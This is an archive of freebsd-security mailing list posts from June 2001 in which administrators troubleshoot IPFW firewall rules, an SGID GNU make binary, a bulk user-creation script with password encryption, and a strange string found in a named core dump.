owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On pain of being relatively obvious, do you have those particular daemons running (such as sshd, etc?) What's the output of tcpdump when you do it? What errors are you recieving? What's the output of sockstat? Have you done an ipfw -t show to see what rules are getting hit/dropped/acked? This should help start the troubleshooting process, sorry I can't be more precise.. :/ Christian On Thu, Jun 07, 2001 at 06:05:37PM +0200, Marcel Dijk babbled: > Delivered-To: cschreiber@netrail.net > Delivered-To: freebsd-security@freebsd.org > From: "Marcel Dijk" > To: > Subject: IPFW rules > ports still open! > Date: Thu, 7 Jun 2001 18:05:37 +0200 > X-Priority: 3 > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 5.00.2919.6700 > X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 > List-ID: > List-Archive: (Web Archive) > List-Help: (List Instructions) > List-Subscribe: > List-Unsubscribe: > X-Loop: FreeBSD.org > Precedence: bulk > > Hello, > > i have tried to make a good firewall but I have some problems. This is my > rc.firewall.rules file. > > add 500 allow all from 192.168.0.0/16 to any > add 525 allow all from any to 192.168.0.0/16 > > #add 575 allow ip from any to MY_IP > #add 600 allow ip from MY_IP to any > > add 615 allow tcp from any to MY_IP 22,5618,10000 > add 625 allow tcp from MY_IP to any > > add 650 allow udp from any to MY_IP > add 700 allow udp from MY_IP to any > > add 800 allow icmp from any to MY_IP > add 750 allow icmp from MY_IP to any > > (MY_IP is my internet IP address. I have blocked it for abvious reasons) > > The problem is that I can't access the services that I have allowed. For > example I can't access the service that's behind port 22 on MY_IP. > Why is this? If I allow IP from any to MY_IP and allow ip from MY_IP to any > all ports are open. And that;s just what I don't want. > > I hope you guys fill me and can help me. > > Thanks, I can't seem to solve this one. > > Marcel > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ---end quoted text--- -- Christian Schreiber, Netrail Network Security Engineer - Ape will not kill Ape To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 9:20:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id CBA1437B403 for ; Thu, 7 Jun 2001 09:20:42 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f57GM3B62803; Thu, 7 Jun 2001 12:22:03 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Thu, 7 Jun 2001 12:22:03 -0400 (EDT) From: David Miner To: edwin chan Cc: Olivier Nicole , Subject: Re: Encrypted passwords In-Reply-To: <009e01c0ef55$da422340$9201a8c0@home.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 7 Jun 2001, edwin chan wrote: > I think that : > you have a user list, and you can make a random password for them, then you > can use "expect" and " passwd user" do your jobs and don't worry how chpass > works. > Using "passwd" for 50 users at a time is something I would like to automate. "adduser" also works, one user at a time. That is what I was trying to get away from. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 9:23:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id 054AC37B401 for ; Thu, 7 Jun 2001 09:23:05 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f57GOVG62834; Thu, 7 Jun 2001 12:24:32 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Thu, 7 Jun 2001 12:24:31 -0400 (EDT) From: David Miner To: Olivier Nicole Cc: Subject: Re: Encrypted passwords In-Reply-To: <200106070159.IAA25340@banyan.cs.ait.ac.th> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Olivier, I will try these things. I am not running NIS. The script is not setuid. I run it as root under my c-shell. Which may part of the problem as you point out. I keep the script in the root directory with 700 permissions. I'll get back to you with the results of the "print" testing. Thanks. David On Thu, 7 Jun 2001, Olivier Nicole wrote: > David, > > >I changed it to a system call from perl and went on. > > As a first step I would try to make sure the system call is what I > really want: replace system' with print' and carefull check for any > strange character. I'd be specially suspicious about the contents of > that variable that holds the password. > > Second I would consider that the system call is made under bourne > shell, it may have a different environment than the shell you use for > every day work, and it may simply be missing some environment > variable. > > I understood you run the scrip as root, it is not a setuid script? > Else you'd need to untaint the variables. > > As a last resort, I'd copy the script, remove all the fancy interface > and keep onlythe system call. Try to split it, addsome print, some pw > usershow, etc. > > Is your system running NIS? It could be a problem that the new user > has not yet propagated through NIS and then the password cannot be > set... > > Olivier > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 9:23:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 6D35C37B405 for ; Thu, 7 Jun 2001 09:23:30 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from ibmka (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with SMTP id UAA44153; Thu, 7 Jun 2001 20:23:18 +0400 (MSD) Message-ID: <00da01c0ef6e$28bc6450$0600a8c0@ibmka.internethelp.ru> From: "Nickolay A. Kritsky" To: "Alfred Perlstein" Cc: Subject: Re: SGID make Date: Thu, 7 Jun 2001 20:23:16 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I thank you all for your suggestions and think that it _is_ GNU make. It seems to be installed from "package collections" located on 4.2 CD, I will check it later. Best regards NKritsky - SysAdmin InternetHelp.Ru http://www.internethelp.ru e-mail: nkritsky@internethelp.ru -----Original Message----- From: Alfred Perlstein To: Nickolay A. Kritsky Cc: security@FreeBSD.ORG Date: 7 èþíÿ 2001 ã. 19:47 Subject: Re: SGID make >* Nickolay A. Kritsky [010607 11:19] wrote: >> Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling >> huge C programs, isnt it? >> >> #ls -l /usr/local/bin/make >> -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make > >As people have stated this isn't our make, it's most likely GNU make >installed without using the port. > >The reason for the sgid'ness is most likely so that the binary can >query the system load average to optimize parrallel compliation >without overwhelming the system. > >Although, this is sort of silly as the info should be available via >sysctl in FreeBSD. > >-- >-Alfred Perlstein [alfred@freebsd.org] >Instead of asking why a piece of software is using "1970s technology," >start asking why software is ignoring 30 years of accumulated wisdom. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 9:39: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-243.dsl.lsan03.pacbell.net [64.165.226.243]) by hub.freebsd.org (Postfix) with ESMTP id E9C9137B406 for ; Thu, 7 Jun 2001 09:39:05 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9B9EC671A4; Thu, 7 Jun 2001 09:39:05 -0700 (PDT) Date: Thu, 7 Jun 2001 09:39:05 -0700 From: Kris Kennaway To: "Nickolay A. Kritsky" Cc: Alfred Perlstein , security@FreeBSD.ORG Subject: Re: SGID make Message-ID: <20010607093905.C51488@xor.obsecurity.org> References: <00da01c0ef6e$28bc6450$0600a8c0@ibmka.internethelp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00da01c0ef6e$28bc6450$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 07, 2001 at 08:23:16PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 08:23:16PM +0400, Nickolay A. Kritsky wrote: > I thank you all for your suggestions and think that it _is_ GNU make. It seems to be installed from "package collections" > located on 4.2 CD, I will check it later. I'm pretty sure we removed this quite some time ago; if not then please let us know. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 9:39:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 9901037B401 for ; Thu, 7 Jun 2001 09:39:42 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from ibmka (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with SMTP id UAA44345; Thu, 7 Jun 2001 20:39:37 +0400 (MSD) Message-ID: <00f501c0ef70$6fdbb820$0600a8c0@ibmka.internethelp.ru> From: "Nickolay A. Kritsky" To: "Marcel Dijk" , Subject: Re: IPFW rules > ports still open! Date: Thu, 7 Jun 2001 20:39:35 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Do you mean, that when you uncomment rules 575 and 600, everything works just fine, or it does not help much? Good Luck NKritsky - SysAdmin InternetHelp.Ru http://www.internethelp.ru e-mail: nkritsky@internethelp.ru -----Original Message----- From: Marcel Dijk To: freebsd-security@FreeBSD.ORG Date: 7 èþíÿ 2001 ã. 20:05 Subject: IPFW rules > ports still open! >Hello, > >i have tried to make a good firewall but I have some problems. This is my >rc.firewall.rules file. > >add 500 allow all from 192.168.0.0/16 to any >add 525 allow all from any to 192.168.0.0/16 > >#add 575 allow ip from any to MY_IP >#add 600 allow ip from MY_IP to any > >add 615 allow tcp from any to MY_IP 22,5618,10000 >add 625 allow tcp from MY_IP to any > >add 650 allow udp from any to MY_IP >add 700 allow udp from MY_IP to any > >add 800 allow icmp from any to MY_IP >add 750 allow icmp from MY_IP to any > >(MY_IP is my internet IP address. I have blocked it for abvious reasons) > >The problem is that I can't access the services that I have allowed. For >example I can't access the service that's behind port 22 on MY_IP. >Why is this? If I allow IP from any to MY_IP and allow ip from MY_IP to any >all ports are open. And that;s just what I don't want. > >I hope you guys fill me and can help me. > >Thanks, I can't seem to solve this one. > >Marcel > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 10: 8: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail1.home.nl (mail1.home.nl [213.51.129.225]) by hub.freebsd.org (Postfix) with ESMTP id EA6E237B403 for ; Thu, 7 Jun 2001 10:07:55 -0700 (PDT) (envelope-from nascar24@home.nl) Received: from windows ([213.51.193.168]) by mail1.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20010607170754.GTWI22865.mail1.home.nl@windows> for ; Thu, 7 Jun 2001 19:07:54 +0200 Message-ID: <02de01c0ef74$79397f70$0900a8c0@windows> From: "Marcel Dijk" To: References: <009e01c0ef55$da422340$9201a8c0@home.net><1569370004.20010607180037@mail.spbnit.ru><0e4001c0ef5c$034299e0$241da8c0@ke.balt.net><20010607190013.4a57045e.nikolaj@mail.spbnit.ru><02ab01c0ef6b$b1002610$0900a8c0@windows> <42123753718.20010607201244@sandy.ru> Subject: Re: IPFW rules > ports still open! Date: Thu, 7 Jun 2001 19:08:29 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 Disposition-Notification-To: "Marcel Dijk" X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > If your address lies in 192.168.0.0/16 then first two rules allows to > access it. In IPFW rules are checked one-by-one before first matching > rule is found. You should add exclusive rules for you IP prior you > open whole network. No, I mean that with these rules I can't connect to for example my sshd. But I have openend the port with rule #615 & 625. And if I uncomment rule 575 & 600 all my ports are open. Marcel > Otherwise check > > IPFIREWALL_DEFAULT_TO_ACCEPT > > kernel option. > > --07.06.2001 20:05, you wrote IPFW rules > ports still open! to freebsd-security@FreeBSD.ORG; > > M> Hello, > > M> i have tried to make a good firewall but I have some problems. This is my > M> rc.firewall.rules file. > > M> add 500 allow all from 192.168.0.0/16 to any > M> add 525 allow all from any to 192.168.0.0/16 > > M> #add 575 allow ip from any to MY_IP > M> #add 600 allow ip from MY_IP to any > > M> add 615 allow tcp from any to MY_IP 22,5618,10000 > M> add 625 allow tcp from MY_IP to any > > M> add 650 allow udp from any to MY_IP > M> add 700 allow udp from MY_IP to any > > M> add 800 allow icmp from any to MY_IP > M> add 750 allow icmp from MY_IP to any > > M> (MY_IP is my internet IP address. I have blocked it for abvious reasons) > > M> The problem is that I can't access the services that I have allowed. For > M> example I can't access the service that's behind port 22 on MY_IP. > M> Why is this? If I allow IP from any to MY_IP and allow ip from MY_IP to any > M> all ports are open. And that;s just what I don't want. > > M> I hope you guys fill me and can help me. > > M> Thanks, I can't seem to solve this one. > > M> Marcel > > > M> To Unsubscribe: send mail to majordomo@FreeBSD.org > M> with "unsubscribe freebsd-security" in the body of the message > > > -- > Vladimir Dubrovin Service Center Coordinator > http://www.sandy.ru SANDY, ISP > http://www.security.nnov.ru Nizhny Novgorod, Russia > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 11: 6: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id A18C437B405 for ; Thu, 7 Jun 2001 11:05:54 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 68184 invoked by uid 1000); 7 Jun 2001 18:06:15 -0000 Date: Thu, 7 Jun 2001 20:06:15 +0200 From: "Karsten W. Rohrbach" To: freebsd-security@FreeBSD.ORG Subject: Re: IPFW rules > ports still open! Message-ID: <20010607200615.P59617@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , freebsd-security@FreeBSD.ORG References: <009e01c0ef55$da422340$9201a8c0@home.net><1569370004.20010607180037@mail.spbnit.ru><0e4001c0ef5c$034299e0$241da8c0@ke.balt.net><20010607190013.4a57045e.nikolaj@mail.spbnit.ru><02ab01c0ef6b$b1002610$0900a8c0@windows> <42123753718.20010607201244@sandy.ru> <02de01c0ef74$79397f70$0900a8c0@windows> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="i0LFOk513GRb+T2w" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <02de01c0ef74$79397f70$0900a8c0@windows>; from nascar24@home.nl on Thu, Jun 07, 2001 at 07:08:29PM +0200 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --i0LFOk513GRb+T2w Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Marcel Dijk(nascar24@home.nl)@2001.06.07 19:08:29 +0000: > > M> add 615 allow tcp from any to MY_IP 22,5618,10000 > > M> add 625 allow tcp from MY_IP to any try: add 615 allow tcp from any to MY_IP 22 add 615 allow tcp from any to MY_IP 5618 add 615 allow tcp from any to MY_IP 10000 add 625 allow tcp from MY_IP to any perhaps there exist some side effects in the rule parser? /k --=20 > God isn't dead -- he's been busted. KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 --i0LFOk513GRb+T2w Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7H8KWM0BPTilkv0YRAvQ6AJ9UUf0aRXV2l1GkdgkaPz8JPWoYvQCfZGKP 1g/9Kb/2To/xIREaPy2GKVQ= =UTCF -----END PGP SIGNATURE----- --i0LFOk513GRb+T2w-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 11:12:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr1.ericy.com (imr1.ericy.com [208.237.135.240]) by hub.freebsd.org (Postfix) with ESMTP id 6614A37B403 for ; Thu, 7 Jun 2001 11:12:44 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr6.exu.ericsson.se (mr6u3.ericy.com [208.237.135.123]) by imr1.ericy.com (8.11.3/8.11.3) with ESMTP id f57ICfa24328; Thu, 7 Jun 2001 13:12:41 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr6.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f57ICe902824; Thu, 7 Jun 2001 13:12:40 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f57ICdG21289; Thu, 7 Jun 2001 14:12:40 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Thu, 7 Jun 2001 14:12:39 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id M3YLLHMG; Thu, 7 Jun 2001 14:12:31 -0400 From: "Antoine Beaupre (LMC)" To: "Karsten W. Rohrbach" Cc: freebsd-security@FreeBSD.ORG Message-ID: <3B1FC40D.68911B9D@lmc.ericsson.se> Date: Thu, 07 Jun 2001 14:12:29 -0400 Organization: LMC, Ericsson Research Canada X-Mailer: Mozilla 4.77 [en]C-CCK-MCD (WinNT; U) X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: IPFW rules > ports still open! References: <009e01c0ef55$da422340$9201a8c0@home.net><1569370004.20010607180037@mail.spbnit.ru><0e4001c0ef5c$034299e0$241da8c0@ke.balt.net><20010607190013.4a57045e.nikolaj@mail.spbnit.ru><02ab01c0ef6b$b1002610$0900a8c0@windows> <42123753718.20010607201244@sandy.ru> <02de01c0ef74$79397f70$0900a8c0@windows> <20010607200615.P59617@mail.webmonster.de> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FWIW, I had some problems adding rules in the format: allow tcp from any to ip 22,3932-32023 I think the parser needs revision... But you have a good hint there, putting the rules in the same rule # A. "Karsten W. Rohrbach" wrote: > > Marcel Dijk(nascar24@home.nl)@2001.06.07 19:08:29 +0000: > > > M> add 615 allow tcp from any to MY_IP 22,5618,10000 > > > M> add 625 allow tcp from MY_IP to any > try: > > add 615 allow tcp from any to MY_IP 22 > add 615 allow tcp from any to MY_IP 5618 > add 615 allow tcp from any to MY_IP 10000 > add 625 allow tcp from MY_IP to any > > perhaps there exist some side effects in the rule parser? > > /k > > -- > > God isn't dead -- he's been busted. > KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie > http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/ > karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de > GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46 > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature -- La sémantique est la gravité de l'abstraction. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 11:19:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id 4E8E537B401 for ; Thu, 7 Jun 2001 11:19:53 -0700 (PDT) (envelope-from karsten@rohrbach.de) Received: (qmail 68653 invoked by uid 1000); 7 Jun 2001 18:20:14 -0000 Date: Thu, 7 Jun 2001 20:20:14 +0200 From: "Karsten W. Rohrbach" To: David Miner Cc: edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010607202014.S59617@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , David Miner , edwin chan , Olivier Nicole , freebsd-security@FreeBSD.ORG References: <009e01c0ef55$da422340$9201a8c0@home.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="D+M1YvVlDncl3vD5" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from david@slis-two.lis.fsu.edu on Thu, Jun 07, 2001 at 12:22:03PM -0400 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --D+M1YvVlDncl3vD5 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable a simple script using pwgen(1) from the ports collection to generate the cleartext password, using pw(8)'s instrumentation for passing a password to it via filehandle would simplify things a bit, i think. /k David Miner(david@slis-two.lis.fsu.edu)@2001.06.07 12:22:03 +0000: > On Thu, 7 Jun 2001, edwin chan wrote: >=20 > > I think that : > > you have a user list, and you can make a random password for them, then= you > > can use "expect" and " passwd user" do your jobs and don't worry how ch= pass > > works. > > > Using "passwd" for 50 users at a time is something I would like to > automate. "adduser" also works, one user at a time. That is what I was > trying to get away from. >=20 > David > --------------------------------------------------------------------- > David R. Miner miner@lis.fsu.edu > Systems Integrator voice: 850-644-8107 > School of Information Studies fax: 850-644-6253 > Florida State University > Tallahassee, FL 32306-2100 >=20 >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --=20 > "The path of excess leads to the tower of wisdom." --W. Blake KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.n= et/ karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 B= F46 --D+M1YvVlDncl3vD5 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7H8XeM0BPTilkv0YRAoPEAJ4lUJR5fnCvmtwZiOfh9kx7SouC2wCgvO8g 2WdElv9TMmC2QE82/9SdjPc= =vy3Y -----END PGP SIGNATURE----- --D+M1YvVlDncl3vD5-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 11:37:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.ipdvbnet.com (adsl-216-100-228-204.dsl.snfc21.pacbell.net [216.100.228.204]) by hub.freebsd.org (Postfix) with ESMTP id 478E837B401 for ; Thu, 7 Jun 2001 11:37:09 -0700 (PDT) (envelope-from Greg.Haa@amux.com) Received: from sunking.ipdvbnet.com (sunking2 [192.168.255.16]) by mercury.ipdvbnet.com (8.11.1/8.11.1) with ESMTP id f57Ib7Y25814 for ; Thu, 7 Jun 2001 11:37:08 -0700 (PDT) (envelope-from Greg.Haa@amux.com) Received: by SUNKING with Internet Mail Service (5.5.2650.21) id ; Thu, 7 Jun 2001 11:37:07 -0700 Message-ID: <2BFD35C3F1F9D31185CE00B0D0202302838707@SUNKING> From: Greg Haa To: "'freebsd-security@FreeBSD.ORG'" Subject: Named Date: Thu, 7 Jun 2001 11:37:05 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So this was in a named.core file. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>BBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAaa or something very similar. Can you tel;l me what this means? -thanks greg.haa@amux.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 11:40:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id 7BC3837B403 for ; Thu, 7 Jun 2001 11:40:33 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f57Ifv764262; Thu, 7 Jun 2001 14:42:01 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Thu, 7 Jun 2001 14:41:57 -0400 (EDT) From: David Miner To: "Karsten W. Rohrbach" Cc: edwin chan , Olivier Nicole , Subject: Re: Encrypted passwords In-Reply-To: <20010607202014.S59617@mail.webmonster.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 7 Jun 2001, Karsten W. Rohrbach wrote: > a simple script using pwgen(1) from the ports collection to generate the > cleartext password, using pw(8)'s instrumentation for passing a password > to it via filehandle would simplify things a bit, i think. > /k > It's not the generation of the passwords that is the problem. It's the encryption. I put print statements into the program, created two users, and check vipw. These are the outputs: entries in pwd.db: try-1:wUe7aHIXK/8O.:1260:1337::0:0:LIStry-1:/usr/try-1:/bin/csh try-2:tgx8fwK0d6cQM:1261:1338::0:0:LIStry-2:/usr/try-2:/bin/csh Program output: Enter password file name: pw7 Password file read Enter path to home directories: /usr Enter class name: try Enter first number wanted: 1 Enter number of users wanted: 2 try-1 chock1 wUlVdJxRtry-1 /usr/try-1 wUe7aHIXK/8O. chpass: updating the database... chpass: done try-2 chock1 tgtM0gIZtry-2 /usr/try-2 